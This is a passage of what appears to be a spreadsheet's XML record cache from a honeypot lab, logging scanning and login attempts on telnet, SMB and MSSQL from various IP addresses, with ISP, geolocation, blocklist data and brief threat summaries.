    <s v="Virgin Media Limited"/>
    <s v="Virgin Media"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2003-02-28"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2007-03-07 12:22:23"/>
    <s v="2026-03-07 12:22:23"/>
    <s v="2025-02-06 07:29:04"/>
    <s v="['NS1.VIRGINMEDIA.NET', 'NS2.VIRGINMEDIA.NET', 'NS3.VIRGINMEDIA.NET', 'NS4.VIRGINMEDIA.NET']"/>
    <s v="ENOM, INC."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="26"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:5201:d317"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1296"/>
    <x v="1296"/>
    <s v="NA&amp;&amp;syn-024-026-037-151.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-17T18:12:36"/>
    <d v="2025-04-14T13:34:33"/>
    <d v="2025-04-17T18:12:36"/>
    <n v="100"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="KY"/>
    <s v="Kentucky"/>
    <s v="Laurel"/>
    <s v="Marydell"/>
    <s v="4299997"/>
    <s v="NA"/>
    <s v="37.1325"/>
    <s v="-84.1646"/>
    <s v="10796"/>
    <s v="Charter Communications Inc"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:181a:2597"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1297"/>
    <x v="1297"/>
    <s v="NA&amp;&amp;114-24-35-98.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-17T18:11:19"/>
    <d v="2025-04-15T13:24:56"/>
    <d v="2025-04-17T18:11:19"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&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NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7218:2362"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1298"/>
    <x v="1298"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T18:10:43"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-17T18:10:43"/>
    <n v="164"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SMB_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;40870&amp;&amp;1433&amp;&amp;445&amp;&amp;51922&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NSK"/>
    <s v="Sai Kung"/>
    <s v="NA"/>
    <s v="Tseung Kwan O"/>
    <s v="1818506"/>
    <s v="NA"/>
    <s v="22.3119"/>
    <s v="114.257"/>
    <s v="134365"/>
    <s v="Ansheng Network Technology Co., Limited"/>
    <s v="Ansheng Network Technology Co., Limited"/>
    <s v="hosting"/>
    <s v="VpsQuan L.L.C"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,51162)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,53068)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,53437)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,50977)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,51064)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,58420)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,58493)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.44.174.84,59786)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c62c:ae54"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1299"/>
    <x v="1299"/>
    <s v="114-38-2-207.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T18:10:08"/>
    <d v="2025-04-16T00:40:59"/>
    <d v="2025-04-17T18:10:08"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23&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NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7226:2cf"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1300"/>
    <x v="1300"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T18:01:14"/>
    <d v="2025-02-18T09:54:21"/>
    <d v="2025-04-17T18:01:14"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HP"/>
    <s v="Himachal Pradesh"/>
    <s v="Sirmaur"/>
    <s v="Nāhan"/>
    <s v="1262151"/>
    <s v="173001"/>
    <s v="30.5575"/>
    <s v="77.2908"/>
    <s v="134294"/>
    <s v="R P World Telecom Pvt Ltd"/>
    <s v="R P World Telecom Pvt Ltd"/>
    <s v="business"/>
    <s v="R P World Telecom Pvt Ltd"/>
    <s v="2015-08-19"/>
    <s v="RPWORLDTELECOM"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,51518)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,51858)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,52037)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,52409)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,51095)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,51429)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,55255)}&amp;&amp;{Data_SMB:Incoming connection (43.246.140.197,55735)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bf6:8cc5"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="The attacker is probing and scanning the system for vulnerable services, attempting to exploit them through various protocols such as FTP, HTTP, HTTPS, LDAP, MSSQL, MYSQL, NTP, SNMP, and SMB. They are also trying to establish connections and gain unauthorized access."/>
    <s v="NCRACK ATTACK"/>
  </r>
  <r>
    <x v="1301"/>
    <x v="1301"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T17:01:11"/>
    <d v="2025-04-17T17:01:11"/>
    <d v="2025-04-17T17:01:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="ST"/>
    <s v="Central Sulawesi"/>
    <s v="Kota Palu"/>
    <s v="Palu"/>
    <s v="1633034"/>
    <s v="NA"/>
    <s v="-0.90833"/>
    <s v="119.871"/>
    <s v="7713"/>
    <s v="telkomnet-as-ap"/>
    <s v="Pt. Telkom Indonesia"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4f7:2ea4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is scanning and probing various services on the network, likely in an attempt to identify vulnerable systems that can be exploited for further attacks. They are attempting to gather information about the network infrastructure, including IP addresses, service versions, and configuration details. The attacker may also be using these probes as a reconnaissance step before launching more targeted attacks. &amp;&amp; The attacker is attempting to scan and exploit various services on the network, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is sending requests to these services in an attempt to gain unauthorized access or retrieve sensitive information."/>
    <s v="Port scanning and exploitation"/>
  </r>
  <r>
    <x v="1302"/>
    <x v="1302"/>
    <s v="NA&amp;&amp;n218250243106.netvigator.com"/>
    <x v="0"/>
    <d v="2025-04-17T16:50:25"/>
    <d v="2025-04-16T07:26:56"/>
    <d v="2025-04-17T16:50:25"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Central"/>
    <s v="8223932"/>
    <s v="NA"/>
    <s v="22.2836"/>
    <s v="114.16"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="Pccw IMS"/>
    <s v="business"/>
    <s v="PCCW Limited"/>
    <s v="2004-07-20"/>
    <s v="NETVIGATOR"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-02-09 05:00:00"/>
    <s v="2026-02-10 05:00:00"/>
    <s v="2025-02-06 06:38:39"/>
    <s v="['NS4.NETVIGATOR.COM', 'NS5.NETVIGATOR.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Domain Administrator"/>
    <x v="24"/>
    <s v="NA"/>
    <s v="RM902, 9F East Exchange Tower 38-40 Leighton Road"/>
    <s v="::ffff:dafa:f36a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1303"/>
    <x v="1303"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T15:29:32"/>
    <d v="2025-04-16T13:01:15"/>
    <d v="2025-04-17T15:29:32"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.8231"/>
    <s v="106.63"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Newass2011xDSLHN"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b4a:46b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1304"/>
    <x v="1304"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T15:29:30"/>
    <d v="2025-04-17T15:19:00"/>
    <d v="2025-04-17T15:29:30"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="PY"/>
    <s v="Paraguay"/>
    <s v="11"/>
    <s v="Central Department"/>
    <s v="San Lorenzo"/>
    <s v="Fernando de la Mora (Fernando Zona Sur)"/>
    <s v="3438115"/>
    <s v="NA"/>
    <s v="-25.3288"/>
    <s v="-57.565"/>
    <s v="23201"/>
    <s v="Telecel S.A."/>
    <s v="Telecel S.A."/>
    <s v="business"/>
    <s v="Telecel S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b578:8013"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1305"/>
    <x v="1305"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T15:22:42"/>
    <d v="2025-04-01T17:21:37"/>
    <d v="2025-04-17T15:22:42"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H22"/>
    <s v="23&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="04"/>
    <s v="West Azerbaijan"/>
    <s v="Urmia"/>
    <s v="Urmia"/>
    <s v="121801"/>
    <s v="NA"/>
    <s v="37.5519"/>
    <s v="45.0555"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="AZARBAIJAN TELECOMMUNICATION, COMPANY"/>
    <s v="business"/>
    <s v="West Azarbaijan Telecommunication, Company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bb:2094"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1306"/>
    <x v="1306"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T15:19:14"/>
    <d v="2025-04-07T21:19:15"/>
    <d v="2025-04-17T15:19:14"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:da9d:dd09"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1307"/>
    <x v="1307"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T15:14:11"/>
    <d v="2025-04-17T11:44:32"/>
    <d v="2025-04-17T15:14:11"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PA"/>
    <s v="Pará"/>
    <s v="Belém"/>
    <s v="Belém"/>
    <s v="3405870"/>
    <s v="NA"/>
    <s v="-1.45583"/>
    <s v="-48.5044"/>
    <s v="28573"/>
    <s v="Claro NXT Telecomunicacoes Ltda"/>
    <s v="Claro NXT Telecomunicacoes Ltda"/>
    <s v="business"/>
    <s v="Claro NXT Telecomunicacoes Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b3d3:d1a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1308"/>
    <x v="1308"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T14:54:58"/>
    <d v="2025-03-07T14:06:04"/>
    <d v="2025-04-17T14:54:58"/>
    <n v="49"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445&amp;&amp;59555&amp;&amp;60125"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UK"/>
    <s v="Uttarakhand"/>
    <s v="Udam Singh Nagar"/>
    <s v="Rudrapur (Awas Vikas)"/>
    <s v="8740322"/>
    <s v="NA"/>
    <s v="28.9876"/>
    <s v="79.4044"/>
    <s v="133278"/>
    <s v="Dehradun Enet Solutions Private Ltd"/>
    <s v="Dehradun Enet Solutions Pvt ltd"/>
    <s v="business"/>
    <s v="Dehradun Enet Solutions Pvt ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,63684)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,64327)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,61572)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,62228)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,58318)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,61967)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,62640)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,59555)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,60125)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,53246)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,53842)}&amp;&amp;{Data_SMB:Incoming connection (103.93.112.148,49535)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:675d:7094"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1309"/>
    <x v="1309"/>
    <s v="NA&amp;&amp;lfbn-poi-1-188-155.w86-233.abo.wanadoo.fr"/>
    <x v="0"/>
    <d v="2025-04-17T14:52:17"/>
    <d v="2025-04-15T17:23:06"/>
    <d v="2025-04-17T14:52:17"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
